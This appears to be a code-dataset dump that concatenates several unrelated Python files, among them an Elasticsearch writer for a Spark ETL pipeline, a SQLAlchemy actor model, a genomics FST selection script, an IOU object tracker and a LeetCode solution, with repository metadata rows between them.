    onto the document (mutating it in place) before serializing.
    """
    doc_id, doc = x[0], x[1]
    doc[get_node_id_name(doc_type)] = doc_id
    # redundant field for backward compatibility with arranger
    doc["node_id"] = doc_id
    return (doc_id, json.dumps(doc))
class Writer(SparkBase):
    """Writes ETL'd Spark dataframes into versioned Elasticsearch indices."""
    def __init__(self, sc, config):
        """Set up the ES client and the index-versioning helper.

        :param sc: Spark context, passed through to SparkBase
        :param config: tube configuration; its ES section carries the
            elasticsearch-hadoop options ('es.nodes', 'es.port', ...)
        """
        super(Writer, self).__init__(sc, config)
        self.es_config = self.config.ES
        self.es = self.get_es()
        self.es.indices.get_alias()  # probe the cluster; raises early if ES is unreachable
        self.versioning = Versioning(self.es)
    def reset_status(self):
        """Clear index-status markers via the versioning helper."""
        self.versioning.reset_status()
    def generate_mapping(self, doc_name, field_types):
        """
        :param doc_name: name of the Elasticsearch document to create mapping for
        :param field_types: dictionary of field and their types
        :return: JSON with proper mapping to be used in Elasticsearch
        """
        es_type = {str: "keyword", float: "float", int: "long"}
        # str fields get an extra 'analyzed' text sub-field for full-text search.
        properties = {
            k: {"type": es_type[v[0]]}
            if v[0] is not str
            else {"type": es_type[v[0]], "fields": {"analyzed": {"type": "text"}}}
            for k, v in list(field_types.items())
        }
        # explicitly mapping 'node_id'
        properties["node_id"] = {"type": "keyword"}
        mapping = {"mappings": {doc_name: {"properties": properties}}}
        return mapping
    def get_es(self):
        """
        Create ElasticSearch instance
        :return: Elasticsearch client built from the 'es.nodes'/'es.port' config
        """
        es_hosts = self.es_config["es.nodes"]
        es_port = self.es_config["es.port"]
        return Elasticsearch([{"host": es_hosts, "port": es_port}])
    def write_to_new_index(self, df, index, doc_type):
        """Serialize the RDD to JSON and save it into index/doc_type via es-hadoop.

        :param df: RDD of (id, doc) pairs
        :param index: target Elasticsearch index name
        :param doc_type: Elasticsearch document type
        """
        df = df.map(lambda x: json_export(x, doc_type))
        # NOTE: es_config aliases self.es_config, so the 'es.resource' entry
        # set here persists on the instance across calls.
        es_config = self.es_config
        es_config["es.resource"] = index + "/{}".format(doc_type)
        df.saveAsNewAPIHadoopFile(
            path="-",
            outputFormatClass="org.elasticsearch.hadoop.mr.EsOutputFormat",
            keyClass="org.apache.hadoop.io.NullWritable",
            valueClass="org.elasticsearch.hadoop.mr.LinkedMapWritable",
            conf=es_config,
        )
    def create_guppy_array_config(self, etl_index_name, types):
        """
        Create index with Guppy configuration for array fields
        :param etl_index_name: base ETL index name (e.g. 'etl_2020...')
        :param types: {field: (python_type, is_array)} — array fields are listed in the doc
        """
        index = "{}-array-config".format(etl_index_name)
        alias = "{}_array-config".format(etl_index_name.split("_")[0])
        mapping = {
            "mappings": {
                "_doc": {
                    "properties": {
                        "timestamp": {"type": "date"},
                        "array": {"type": "keyword"},
                    }
                }
            }
        }
        latest_transaction_time = get_latest_utc_transaction_time()
        doc = {
            "timestamp": latest_transaction_time,
            "array": ["{}".format(k) for k, v in list(types.items()) if v[1]],
        }
        try:
            self.reset_status()
            index_to_write = self.versioning.create_new_index(
                mapping, self.versioning.get_next_index_version(index)
            )
            self.es.index(index_to_write, "_doc", id=etl_index_name, body=doc)
            self.versioning.putting_new_version_tag(index_to_write, index)
            self.versioning.putting_new_version_tag(index_to_write, alias)
            putting_timestamp(self.es, index_to_write)
            self.reset_status()
        # NOTE(review): broad catch-and-print swallows all failures here —
        # confirm this best-effort behavior is intended.
        except Exception as e:
            print(e)
    def write_df(self, df, index, doc_type, types):
        """
        Function to write the data frame to ElasticSearch
        :param df: data frame to be written
        :param index: name of the index
        :param doc_type: document type's name
        :param types: field-type dict used to build the index mapping
        :return: None
        """
        try:
            for plugin in post_process_plugins:
                df = df.map(lambda x: plugin(x))
            types = add_auth_resource_path_mapping(types)
            mapping = self.generate_mapping(doc_type, types)
            self.reset_status()
            index_to_write = self.versioning.create_new_index(
                mapping, self.versioning.get_next_index_version(index)
            )
            self.write_to_new_index(df, index_to_write, doc_type)
            self.versioning.putting_new_version_tag(index_to_write, index)
            putting_timestamp(self.es, index_to_write)
            self.reset_status()
        # NOTE(review): broad catch-and-print swallows all failures here —
        # confirm this best-effort behavior is intended.
        except Exception as e:
            print(e)
| 916 | 3,524 | 46 |
f1f3adb057037033ad40b0b8a142e4de788ee12b | 1,724 | py | Python | classes/utility.py | aryanmsr/Drone_Delivery | ca682faa4396030fb948e1f289f541bac6e2cf27 | [
"MIT"
] | 1 | 2021-09-10T22:36:04.000Z | 2021-09-10T22:36:04.000Z | classes/utility.py | aryanmsr/Drone_Delivery | ca682faa4396030fb948e1f289f541bac6e2cf27 | [
"MIT"
] | null | null | null | classes/utility.py | aryanmsr/Drone_Delivery | ca682faa4396030fb948e1f289f541bac6e2cf27 | [
"MIT"
] | 1 | 2021-03-09T17:17:13.000Z | 2021-03-09T17:17:13.000Z | import math
from classes.dataframes import *
import numpy as np
# class Utility:
#
# def __init__(self):
# self.Data = Dataframes()
# self.df_orders = self.Data.get_df_orders()
# self.grid_rows = self.Data.grid_row
# self.grid_cols = self.Data.grid_col
# self.df_wrhs = self.Data.get_df_wareouses()
# def calc_distance(self, xa, ya, xb, yb):
# return math.sqrt((abs(xa - xb)) ** 2 + (abs(ya - yb)) ** 2)
| 30.245614 | 82 | 0.534223 | import math
from classes.dataframes import *
import numpy as np
# class Utility:
#
# def __init__(self):
# self.Data = Dataframes()
# self.df_orders = self.Data.get_df_orders()
# self.grid_rows = self.Data.grid_row
# self.grid_cols = self.Data.grid_col
# self.df_wrhs = self.Data.get_df_wareouses()
# def calc_distance(self, xa, ya, xb, yb):
# return math.sqrt((abs(xa - xb)) ** 2 + (abs(ya - yb)) ** 2)
def dist(a, b):
    """Euclidean distance between two 2-D points, or row-wise distances
    when either argument is a numpy array of coordinate rows."""
    if isinstance(a, np.ndarray) or isinstance(b, np.ndarray):
        # Vectorised path: per-row distance across matched coordinate rows.
        return np.sqrt(((a - b) ** 2).sum(1))
    dx = a[0] - b[0]
    dy = a[1] - b[1]
    return np.sqrt(dx ** 2 + dy ** 2)
def num_turns(self, dist):
    # Number of whole turns needed to cover `dist` (rounded up).
    # NOTE(review): `self` is unused and the `dist` parameter shadows the
    # module-level dist() above — this looks like a method lifted from the
    # commented-out Utility class; confirm how callers invoke it.
    return math.ceil(dist)
# get closest order location and distance to current drone position
# def get_closest_order(self, cur_pos):
# min = math.sqrt(self.grid_rows ** 2 + self.grid_cols ** 2)
# x_pos, y_pos = 0, 0
# for index, row in self.df_orders.iterrows():
# tmp = self.calc_distance(cur_pos[0], cur_pos[1], row["X"], row["Y"])
# if tmp < min:
# min = tmp
# x_pos = row["X"]
# y_pos = row["Y"]
# return [min, x_pos, y_pos]
#
#
# def get_closest_warehouse(self, cur_pos):
# min = math.sqrt(self.grid_rows ** 2 + self.grid_cols ** 2)
# x_pos, y_pos = 0, 0
# for index, row in self.df_wrhs.iterrows():
# tmp = self.calc_distance(cur_pos[0], cur_pos[1], row["X"], row["Y"])
# if tmp < min:
# min = tmp
# x_pos = row["X"]
# y_pos = row["Y"]
# return [min, x_pos, y_pos]
# def find_new_pos(self, xa, ya, xb, yb):
| 1,222 | 0 | 46 |
ec6d03f3c81832af35ad4292ffbea309d914297d | 1,312 | py | Python | models/actors.py | wanderindev/udacity-casting-agency | a123ff26ffc565bfff4f4f829ae7613a6ccb366d | [
"MIT"
] | 1 | 2021-01-10T19:34:24.000Z | 2021-01-10T19:34:24.000Z | models/actors.py | wanderindev/udacity-casting-agency | a123ff26ffc565bfff4f4f829ae7613a6ccb366d | [
"MIT"
] | 1 | 2021-04-30T21:07:42.000Z | 2021-04-30T21:07:42.000Z | models/actors.py | wanderindev/udacity-casting-agency | a123ff26ffc565bfff4f4f829ae7613a6ccb366d | [
"MIT"
] | null | null | null | from typing import Dict, List, Union
from sqlalchemy.dialects.postgresql import ENUM
from db import db
from models.model_mixin import ModelMixin
ActorJSON = Dict[str, Union[int, str, List[str]]]
gender_enum = ENUM("Male", "Female", name="gender")
class ActorModel(db.Model, ModelMixin):
"""SQLAlchemy model for actors"""
__tablename__ = "actors"
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
date_of_birth = db.Column(db.Date, nullable=False)
gender = db.Column(gender_enum)
@classmethod
@classmethod
@classmethod
| 29.818182 | 62 | 0.623476 | from typing import Dict, List, Union
from sqlalchemy.dialects.postgresql import ENUM
from db import db
from models.model_mixin import ModelMixin
ActorJSON = Dict[str, Union[int, str, List[str]]]
gender_enum = ENUM("Male", "Female", name="gender")
class ActorModel(db.Model, ModelMixin):
    """SQLAlchemy model for actors.

    Columns: surrogate ``id`` key, required ``name`` and ``date_of_birth``,
    and an optional ``gender`` restricted to the shared PostgreSQL ENUM
    ("Male"/"Female").  ``json()`` additionally serializes ``self.movies``
    -- presumably a relationship declared on a related model or provided by
    ModelMixin; not visible in this file, verify before relying on it.
    """
    __tablename__ = "actors"
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(50), nullable=False)
    date_of_birth = db.Column(db.Date, nullable=False)
    # Nullable by default: gender may be left unset.
    gender = db.Column(gender_enum)
    def __init__(self, **kwargs):
        # Plain pass-through: the declarative base assigns column values
        # from the given keyword arguments.
        super(ActorModel, self).__init__(**kwargs)
    @classmethod
    def find_all(cls) -> List["ActorModel"]:
        """Return every actor, ordered alphabetically by name."""
        return cls.query.order_by(ActorModel.name).all()
    @classmethod
    def find_by_id(cls, _id: int) -> "ActorModel":
        """Return the actor with primary key ``_id``, or None if absent."""
        return cls.query.filter_by(id=_id).first()
    @classmethod
    def find_by_name(cls, name: str) -> "ActorModel":
        """Return the first actor whose name matches exactly, or None."""
        return cls.query.filter_by(name=name).first()
    def json(self) -> ActorJSON:
        """Serialize the actor (plus related movie titles) to a dict."""
        return {
            "id": self.id,
            "name": self.name,
            "date_of_birth": self.date_of_birth,
            "gender": self.gender,
            "movies": [movie.title for movie in self.movies],
        }
| 542 | 0 | 139 |
a31eed23d55b6f7f1f91bb159c2db44ee1f8820c | 2,535 | py | Python | wgs/geno2hierfst.py | trmznt/pys | 0f66d52e5d166140c3358f8c6af9ad4cee2e2b7e | [
"MIT"
] | null | null | null | wgs/geno2hierfst.py | trmznt/pys | 0f66d52e5d166140c3358f8c6af9ad4cee2e2b7e | [
"MIT"
] | null | null | null | wgs/geno2hierfst.py | trmznt/pys | 0f66d52e5d166140c3358f8c6af9ad4cee2e2b7e | [
"MIT"
] | 2 | 2018-09-19T00:52:15.000Z | 2021-05-14T23:04:47.000Z | #!/usr/bin/env spcli
# this command runs hierarchical FST comparison
from seqpy import cout, cerr
from seqpy.cmds import arg_parser
from seqpy.core.bioio import tabparser
import itertools
import allel
| 28.483146 | 91 | 0.584615 | #!/usr/bin/env spcli
# this command runs hierarchical FST comparison
from seqpy import cout, cerr
from seqpy.cmds import arg_parser
from seqpy.core.bioio import tabparser
import itertools
import allel
def init_argparser(p=None):
    """Build the command-line parser for the hierarchical-FST script.

    Adds ``--hierfile`` (required hierarchy description), ``--cumfst``
    (cumulative-FST budget per comparison) and ``--minfst`` (per-position
    FST floor) on top of the base tabparser arguments.

    NOTE(review): the ``p`` argument is ignored -- the parser is always
    recreated via ``tabparser.init_argparser()``.  Confirm whether callers
    ever pass a pre-built parser here.
    """
    p = tabparser.init_argparser()
    p.add_argument('--hierfile', required=True, help="file describing hierarchical groups")
    p.add_argument('--cumfst', type=float, default=2.0)
    p.add_argument('--minfst', type=float, default=0.75)
    return p
def main( args ):
    # spcli entry point: delegate straight to the worker function.
    geno2hierfst( args )
def geno2hierfst( args ):
    """Select high-FST SNP positions along a hierarchy of population splits.

    Each non-comment line of ``args.hierfile`` defines one comparison as two
    tab-separated partitions, each a comma-joined list of group names.  For
    every comparison, per-position Hudson FST between the two partitions is
    computed; positions are then picked greedily from the highest FST down
    until FST drops below ``--minfst`` or the accumulated FST exceeds
    ``--cumfst``.  Selected positions are written to stdout.
    """
    genoparser = tabparser.GenotypeLineParser( args )
    genoparser.set_translator(genoparser.diploid_translator)
    cerr('Grouping:')
    groups = genoparser.parse_grouping()
    for k in groups:
        cout(' %12s %3d' % (k, len(groups[k])))
    # Parse the hierarchy file into (partition1, partition2) sample lists.
    hierarchy = []
    with open(args.hierfile) as hierfile:
        for line in hierfile:
            line = line.strip()
            if not line: continue
            if line.startswith('#'): continue
            partitions = line.split('\t')
            print(partitions)
            par1 = list(itertools.chain.from_iterable(
                groups[k] for k in partitions[0].split(',')))
            par2 = list(itertools.chain.from_iterable(
                groups[k] for k in partitions[1].split(',')))
            hierarchy.append( (par1, par2) )
    cerr('[I: preparing %d hierarchy]' % len(hierarchy))
    cerr('[I: reading genotype file...]')
    genotypes = genoparser.parse_all()
    genoarray = allel.GenotypeArray( genotypes )
    #import IPython; IPython.embed()
    # Free the raw genotype list; only the allel array is needed from here.
    del genotypes
    selected_positions = []
    c = 1
    for (grp1, grp2) in hierarchy:
        cerr('[I: processing hierarchy #%d]' % c)
        FST = []
        ac_g1 = genoarray.count_alleles(subpop = grp1)
        ac_g2 = genoarray.count_alleles(subpop = grp2)
        #import IPython; IPython.embed()
        num, den = allel.stats.hudson_fst(ac_g1, ac_g2)
        fst = num/den
        # Clamp out-of-range or NaN ratios (e.g. when the denominator is 0)
        # to 0 so they sort to the bottom of the ranking.
        for p,v in zip(genoparser.position, fst):
            if not (0.0 <= v <= 1.0):
                v = 0
            FST.append( (v,p) )
        FST.sort( reverse=True )
        # Greedy selection from the top of the FST ranking, bounded by both
        # the per-position floor and the cumulative budget.
        cumulative_fst = 0.0
        for (v, p) in FST:
            if v < args.minfst:
                break
            if cumulative_fst > args.cumfst:
                break
            selected_positions.append( (p, v) )
            cumulative_fst += v
        c += 1
    # p is a position record from the parser; fields 0, 1 and 4 are emitted
    # (presumably chromosome, coordinate and an allele/id field -- defined in
    # tabparser, not visible here; verify before changing the output format).
    for (p, v) in selected_positions:
        cout('%s\t%s\t%s\t%5.4f' % (p[0], p[1], p[4], v))
| 2,257 | 0 | 69 |
8c203230e3e1b5e416eb97d5dc3c5303073b202d | 3,636 | py | Python | src/preprocess/vipcup_data_split.py | cmlab-mira/MedicalPro | 3918c95197fd24406ce2117cc7ff9ce21bb8c620 | [
"MIT"
] | 6 | 2020-02-01T07:19:32.000Z | 2021-05-10T13:55:49.000Z | src/preprocess/vipcup_data_split.py | cmlab-mira/MedicalPro | 3918c95197fd24406ce2117cc7ff9ce21bb8c620 | [
"MIT"
] | 1 | 2020-06-21T08:33:35.000Z | 2020-06-21T08:33:35.000Z | src/preprocess/vipcup_data_split.py | cmlab-mira/MedicalPro | 3918c95197fd24406ce2117cc7ff9ce21bb8c620 | [
"MIT"
] | 1 | 2020-11-11T06:24:12.000Z | 2020-11-11T06:24:12.000Z | import argparse
import csv
import logging
import random
import numpy as np
import nibabel as nib
from pathlib import Path
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s | %(name)-4s | %(levelname)-4s | %(message)s',
level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
args = _parse_args()
main(args)
| 42.776471 | 121 | 0.657866 | import argparse
import csv
import logging
import random
import numpy as np
import nibabel as nib
from pathlib import Path
def main(args):
    """Create k cross-validation split CSVs plus a fixed test split.

    The first ``args.test_size`` patient directories (sorted by name) form a
    fixed test fold; the remaining patients are ranked by total tumor volume,
    dealt into ``args.k`` columns so each fold covers the full size spectrum,
    and the columns are shuffled to assign validation folds.  One CSV per
    fold plus ``testing.csv`` are written to ``args.output_dir``.
    """
    # Deterministic patient ordering, then split off the fixed test fold
    # (the official validation fold).
    patient_dirs = sorted(dir_ for dir_ in (args.resampled_data_dir / 'training').iterdir() if dir_.is_dir())
    test_size = args.test_size
    test_folds = patient_dirs[:test_size]
    folds = patient_dirs[test_size:]
    np.random.seed(0)  # reproducible fold assignment
    output_dir = args.output_dir
    if not output_dir.is_dir():
        output_dir.mkdir(parents=True)
    # Total tumor volume per patient: sum of positive label values scaled by
    # the voxel volume (pixdim[1:4]).
    # NOTE(review): this sums the label *values*, not the voxel count -- for
    # label ids > 1 this weights classes by their id; confirm intended.
    patient_info = {}
    for dir_ in folds:
        patient_id = dir_.name
        label_path = dir_ / f'{patient_id}_label.nii.gz'
        metadata = nib.load(label_path)
        pixel_size = np.prod(metadata.header['pixdim'][1:4])
        label = metadata.get_fdata()
        tumor_size = np.sum(label[label > 0]) * pixel_size
        patient_info[patient_id] = tumor_size
    # Sort patients by tumor volume and drop the remainder so the list
    # reshapes evenly into k columns.
    sorted_patient_list = sorted(patient_info.keys(), key=patient_info.__getitem__)
    remainder = len(sorted_patient_list) % args.k
    if remainder:
        # Bug fix: the previous `lst[:-(n % k)]` emptied the whole list when
        # the length was already divisible by k (slice [:-0] == [:0]).
        sorted_patient_list = sorted_patient_list[:-remainder]
    splited_patient_list = np.array(sorted_patient_list).reshape(-1, args.k)
    # Shuffle the k columns in place so fold assignment is random while each
    # fold still samples every tumor-size stratum (one patient per row).
    np.take(splited_patient_list, np.random.permutation(splited_patient_list.shape[1]), axis=1, out=splited_patient_list)
    for i in range(args.k):
        valid_patient_list = splited_patient_list[:, i].reshape(-1)
        valid_folds = [args.resampled_data_dir / 'training' / pid for pid in valid_patient_list]
        train_folds = tuple(set(folds) - (set(test_folds) | set(valid_folds)))
        csv_path = output_dir / f'{i}.csv'
        logging.info(f'Write the data split file to "{csv_path.resolve()}".')
        with open(csv_path, 'w', newline='') as f:
            writer = csv.writer(f)
            writer.writerow(['path', 'type'])
            for path in sorted(train_folds):
                writer.writerow([path.resolve(), 'train'])
            for path in sorted(valid_folds):
                writer.writerow([path.resolve(), 'valid'])
            for path in sorted(test_folds):
                writer.writerow([path.resolve(), 'test'])
    # Write testing data split file (official testing set, no labels needed).
    patient_dirs = sorted(dir_ for dir_ in (args.data_dir / 'testing').iterdir() if dir_.is_dir())
    csv_path = output_dir / 'testing.csv'
    logging.info(f'Write the data split file to "{csv_path.resolve()}".')
    with open(csv_path, 'w', newline='') as f:
        writer = csv.writer(f)
        writer.writerow(['path', 'type'])
        for path in patient_dirs:
            writer.writerow([path, 'test'])
def _parse_args():
parser = argparse.ArgumentParser(description="The LiTS data split script.")
parser.add_argument('data_dir', type=Path, help='The directory of the data.')
parser.add_argument('resampled_data_dir', type=Path, help='The directory of the resampled data.')
parser.add_argument('output_dir', type=Path, help='The output directory of the data split files.')
parser.add_argument('--k', type=int, choices=[3, 5], default=3,
help='The number of folds for cross-validation.')
parser.add_argument('--test_size', type=int, default=35, help='The number of testing data.')
args = parser.parse_args()
return args
if __name__ == "__main__":
    # Script entry point: configure root logging first so that main() can
    # log, then run the split with the parsed command-line arguments.
    logging.basicConfig(format='%(asctime)s | %(name)-4s | %(levelname)-4s | %(message)s',
                        level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
    args = _parse_args()
    main(args)
| 3,233 | 0 | 46 |
85c4bda8994ba1d1ab30006d431cffaa6357194c | 5,887 | py | Python | exercises/super_ugly_number.py | David-Jianguang-Ran/LeetCodePracticeHelper | e76a25704eb41980b8d949ee1046a35a6a6ef0f6 | [
"MIT"
] | null | null | null | exercises/super_ugly_number.py | David-Jianguang-Ran/LeetCodePracticeHelper | e76a25704eb41980b8d949ee1046a35a6a6ef0f6 | [
"MIT"
] | null | null | null | exercises/super_ugly_number.py | David-Jianguang-Ran/LeetCodePracticeHelper | e76a25704eb41980b8d949ee1046a35a6a6ef0f6 | [
"MIT"
] | null | null | null | from base import LeetCodeProblem
class Problem(LeetCodeProblem):
# for behaviours other than exact match between solution output and expected output
# see # Testers in README.md
"""
https://leetcode.com/problems/super-ugly-number/
# first attempt:
## invariant
since all prime factor of SUNum are in primes,
it means SUNums can be obtained by multiplying primes
## approach:
generate SUNum by multiplying members of primes and push onto a max heap
when max heap reaches n size, get max
"""
# instanciate your Problem class and run
prob = Problem()
prob.run()
| 36.79375 | 147 | 0.515543 | from base import LeetCodeProblem
class Problem(LeetCodeProblem):
    """
    https://leetcode.com/problems/super-ugly-number/

    A super ugly number is a positive integer whose prime factors all belong
    to ``primes``; by convention 1 is the first super ugly number.

    The original heuristic (pushing products of already-found ugly numbers
    onto a bounded max-heap with an ad-hoc "clip" schedule) did not
    guarantee enumerating the n smallest values -- its largest test case was
    commented out.  It is replaced by the standard k-way-merge algorithm:
    a min-heap holds, for every prime p, the next candidate p * ugly[i].
    Time O((n + duplicates) * log k), space O(n + k).
    """

    def get_tests(self):
        # Each test case: ((n, primes), expected n-th super ugly number).
        return (
            ((12, [2, 7, 13, 19]), 32),
            ((80, [2, 3, 7, 11, 19, 31, 37, 41, 43, 47]), 189),
            ((3, [2]), 4),
            ((10, [2, 5, 7, 11, 13, 17, 23, 29, 43, 53]), 14),
            ((35, [2, 5, 7, 11, 13, 23, 29, 31, 53, 67, 71, 73, 79, 89, 97, 107, 113, 127, 131, 137]), 67),
            ((80, [2, 5, 11, 17, 41, 47, 53, 59, 61, 67, 73, 79, 89, 97, 103, 107, 109, 113, 127, 137]), 274),
            ((850, [7, 13, 29, 31, 37, 41, 43, 53, 59, 61, 71, 73, 79, 83, 89, 101, 107, 109, 127, 131, 137, 149, 151, 157, 173, 227, 229, 233, 239, 257]), 48581),
            # Large case -- the k-way-merge solution handles it; re-enable if
            # the harness runtime budget allows:
            # ((100000, [7,19,29,37,41,47,53,59,61,79,83,89,101,103,109,127,131,137,139,157,167,179,181,199,211,229,233,239,241,251]), 1092889481),
        )

    def solution(self, n, primes):
        """Return the n-th super ugly number (1-indexed; the first is 1)."""
        import heapq  # local import: the module otherwise only needs `base`

        ugly = [1]
        # Heap entries are (candidate_value, prime, index) meaning
        # candidate_value == prime * ugly[index].
        heap = [(p, p, 0) for p in primes]
        heapq.heapify(heap)
        while len(ugly) < n:
            value, prime, idx = heapq.heappop(heap)
            if value != ugly[-1]:
                # Skip duplicates: the same value can be produced by several
                # primes (e.g. 2 * 7 == 7 * 2).
                ugly.append(value)
            # Advance this prime's pointer.  idx + 1 < len(ugly) always holds
            # because value > ugly[idx], so ugly[idx] is never the last entry.
            heapq.heappush(heap, (prime * ugly[idx + 1], prime, idx + 1))
        return ugly[-1]
# Instantiate the Problem class and run its test cases (executes on import).
prob = Problem()
prob.run()
| 5,221 | 0 | 53 |
7ea446547a306d0562fe342d35ffc735e55db031 | 873 | py | Python | python/graphscope/nx/tests/algorithms/forward/operators/test_all.py | LI-Mingyu/GraphScope-MY | 942060983d3f7f8d3a3377467386e27aba285b33 | [
"Apache-2.0"
] | 1,521 | 2020-10-28T03:20:24.000Z | 2022-03-31T12:42:51.000Z | python/graphscope/nx/tests/algorithms/forward/operators/test_all.py | LI-Mingyu/GraphScope-MY | 942060983d3f7f8d3a3377467386e27aba285b33 | [
"Apache-2.0"
] | 850 | 2020-12-15T03:17:32.000Z | 2022-03-31T11:40:13.000Z | python/graphscope/nx/tests/algorithms/forward/operators/test_all.py | LI-Mingyu/GraphScope-MY | 942060983d3f7f8d3a3377467386e27aba285b33 | [
"Apache-2.0"
] | 180 | 2020-11-10T03:43:21.000Z | 2022-03-28T11:13:31.000Z | import networkx.algorithms.operators.tests.test_all
import pytest
from graphscope.nx.utils.compat import import_as_graphscope_nx
import_as_graphscope_nx(networkx.algorithms.operators.tests.test_all,
decorators=pytest.mark.usefixtures("graphscope_session"))
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
@pytest.mark.skip(reason="not support multigraph")
| 22.973684 | 81 | 0.776632 | import networkx.algorithms.operators.tests.test_all
import pytest
from graphscope.nx.utils.compat import import_as_graphscope_nx
import_as_graphscope_nx(networkx.algorithms.operators.tests.test_all,
decorators=pytest.mark.usefixtures("graphscope_session"))
# graphscope.nx does not support MultiGraph, so the upstream networkx tests
# below (pulled into this module by import_as_graphscope_nx above) are
# overridden with same-named, skipped no-op stubs.
@pytest.mark.skip(reason="not support multigraph")
def test_intersection_all_multigraph_attributes():
    pass
@pytest.mark.skip(reason="not support multigraph")
def test_union_all_multigraph():
    pass
@pytest.mark.skip(reason="not support multigraph")
def test_mixed_type_union():
    pass
@pytest.mark.skip(reason="not support multigraph")
def test_mixed_type_disjoint_union():
    pass
@pytest.mark.skip(reason="not support multigraph")
def test_mixed_type_intersection():
    pass
@pytest.mark.skip(reason="not support multigraph")
def test_mixed_type_compose():
    pass
| 140 | 0 | 132 |
a1ab316782f87a08c7277aac1d21ca2fcbd66929 | 3,226 | py | Python | analytics/ot-iou/iou_tracker.py | QuPengfei/Smart-City-Sample | d0813666467e030fc8a6bcbffd098273912118f8 | [
"BSD-3-Clause"
] | 126 | 2019-07-15T14:44:54.000Z | 2022-03-22T11:03:50.000Z | analytics/ot-iou/iou_tracker.py | QuPengfei/Smart-City-Sample | d0813666467e030fc8a6bcbffd098273912118f8 | [
"BSD-3-Clause"
] | 97 | 2019-07-16T18:28:29.000Z | 2022-03-16T07:27:57.000Z | analytics/ot-iou/iou_tracker.py | QuPengfei/Smart-City-Sample | d0813666467e030fc8a6bcbffd098273912118f8 | [
"BSD-3-Clause"
] | 74 | 2019-07-15T14:45:02.000Z | 2022-03-23T12:10:03.000Z |
import os
| 44.805556 | 169 | 0.583385 |
import os
class IOUTracker(object):
    """Frame-by-frame IOU tracker.

    Detections are associated to active tracks greedily by highest IOU with
    the track's last box.  A track is "finished" once its best detection
    confidence has reached ``sigma_h`` and it lasted at least ``t_min``
    frames.

    NOTE(review): ``track()`` re-appends qualifying active tracks to
    ``tracks_finished`` on every call, so that list can contain duplicates
    across frames; kept as-is because downstream consumers are not visible
    here.
    """
    def __init__(self, sigma_l=0, sigma_h=0.5, sigma_iou=0.5, t_min=2):
        """
        :param sigma_l: minimum detection confidence to be considered at all
        :param sigma_h: confidence a track must reach once to be finished
        :param sigma_iou: minimum IOU to extend a track with a detection
        :param t_min: minimum track length (frames) to count as finished
        """
        super(IOUTracker, self).__init__()
        self.tracks_active = []
        self.tracks_finished = []
        self.track_id = 0
        self.sigma_l = sigma_l
        self.sigma_h = sigma_h
        self.sigma_iou = sigma_iou
        self.t_min = t_min
    def iou(self, bbox1, bbox2):
        """Intersection-over-union of two [x0, y0, x1, y1] boxes."""
        bbox1 = [float(x) for x in bbox1]
        bbox2 = [float(x) for x in bbox2]
        (x0_1, y0_1, x1_1, y1_1) = bbox1
        (x0_2, y0_2, x1_2, y1_2) = bbox2
        # Overlap rectangle; empty (or degenerate) when boxes are disjoint.
        overlap_x0 = max(x0_1, x0_2)
        overlap_y0 = max(y0_1, y0_2)
        overlap_x1 = min(x1_1, x1_2)
        overlap_y1 = min(y1_1, y1_2)
        if overlap_x1 - overlap_x0 <= 0 or overlap_y1 - overlap_y0 <= 0:
            return 0
        # Ratio of the intersection area to the union of both box areas.
        size_1 = (x1_1 - x0_1) * (y1_1 - y0_1)
        size_2 = (x1_2 - x0_2) * (y1_2 - y0_2)
        size_intersection = (overlap_x1 - overlap_x0) * (overlap_y1 - overlap_y0)
        size_union = size_1 + size_2 - size_intersection
        return size_intersection / size_union
    def track(self, detections, debug=False):
        """Update tracker state with one frame's detections.

        :param detections: dicts with 'bbox', 'confidence', 'object_type', 'idx'
        :param debug: print track updates when True
        :return: the list of active tracks after this frame
        """
        dets = [det for det in detections if det['confidence'] >= self.sigma_l]
        updated_tracks = []
        new_tracks = []
        for track in self.tracks_active:
            if len(dets) > 0:
                # Greedy association: the detection with the highest IOU wins.
                best_match = max(dets, key=lambda x: self.iou(track['bboxes'][-1], x['bbox']))
                if self.iou(track['bboxes'][-1], best_match['bbox']) >= self.sigma_iou:
                    track['bboxes'].append(best_match['bbox'])
                    track['max_confidence'] = max(track['max_confidence'], best_match['confidence'])
                    track['object_type'] = best_match['object_type']
                    track['idx'] = best_match['idx']
                    updated_tracks.append(track)
                    if debug: print("keep track: ", track, flush=True)
                    # Each detection may extend at most one track.
                    del dets[dets.index(best_match)]
            # If the track was not updated this frame, finish it when the
            # confidence/length conditions are met; either way it is dropped
            # from the active set.
            if len(updated_tracks) == 0 or track is not updated_tracks[-1]:
                if track['max_confidence'] >= self.sigma_h and len(track['bboxes']) >= self.t_min:
                    self.tracks_finished.append(track)
        # Every remaining (unmatched) detection starts a new track.
        # Bug fix: the previous code *reassigned* new_tracks inside this loop,
        # so only the last unmatched detection ever became a track.
        for det in dets:
            new_tracks.append({'track_id': self.track_id, 'bboxes': [det['bbox']],
                               'max_confidence': det['confidence'],
                               'object_type': det['object_type'], "idx": det["idx"]})
            self.track_id = self.track_id + 1
            if debug: print("add track: ", new_tracks[-1], flush=True)
        self.tracks_active = updated_tracks + new_tracks
        # Finish all active tracks that already meet the criteria.
        self.tracks_finished += [track for track in self.tracks_active
                                 if track['max_confidence'] >= self.sigma_h and len(track['bboxes']) >= self.t_min]
        return self.tracks_active
| 3,108 | 4 | 103 |
a218acf09f6d2a9040b321e06c6de2132b281baa | 2,260 | py | Python | src/preprocess.py | Smashh712/chainRec | 128a0b4e9c1728930aaab55f364d681410483fbe | [
"Apache-2.0"
] | 50 | 2018-09-22T12:09:30.000Z | 2021-05-15T13:14:44.000Z | src/preprocess.py | AkkyPali/chainRec | 23badc2a1bb735f6f0a366dcb2c0735f5961b7d6 | [
"Apache-2.0"
] | 3 | 2018-11-23T09:10:02.000Z | 2019-07-31T07:08:22.000Z | src/preprocess.py | AkkyPali/chainRec | 23badc2a1bb735f6f0a366dcb2c0735f5961b7d6 | [
"Apache-2.0"
] | 18 | 2018-09-28T04:09:02.000Z | 2021-10-04T18:16:54.000Z | import numpy as np
import pandas as pd
import gzip
import sys
from collections import Counter
import os
DATA_DIR = "../data/"
